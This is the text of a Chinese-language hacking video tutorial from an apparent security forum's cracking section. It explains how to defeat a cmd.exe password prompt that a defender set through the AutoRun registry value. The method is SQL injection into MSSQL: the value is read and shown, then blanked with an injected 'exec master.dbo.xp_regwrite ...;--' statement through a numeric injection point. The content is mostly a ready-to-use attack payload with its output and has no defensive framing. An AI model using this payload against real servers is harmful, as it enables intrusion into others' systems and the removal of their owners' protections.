动画介绍:执行cmd后就是这样,要输入密码,我们得找到他的原理
set /p pass=123456 这儿设置的密码
注册表 找到[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
AutoRun
我们来读autorun的值
Execute read reg function ok!
Read reg ok ; )
Reg value is : e:\cmd.bat
Drop temp table ok!
bat的路径为e:\cmd.bat
我最原始的思路是把cmd.bat改名,我们试试,不行,因为一样要调用e:\cmd.bat,呵呵,看来我们只有通过注册表来突破了
exec maseter.dbo.xp_regwrite Root_Key,SubKey,Value_Type,Value
思路是把autorun的值通过mssql的扩展xp_regwrite改写为空,上面是这个扩展的用法
exec master.dbo.xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Command Processor’,’AutoRun’,’REG_SZ’,’’;--
语句我已经整理:REG_SZ表示字符串 ’’表示为空
注入点的类型为数字整型 | |
安全中国首页 > 动画中心 > 其他破解
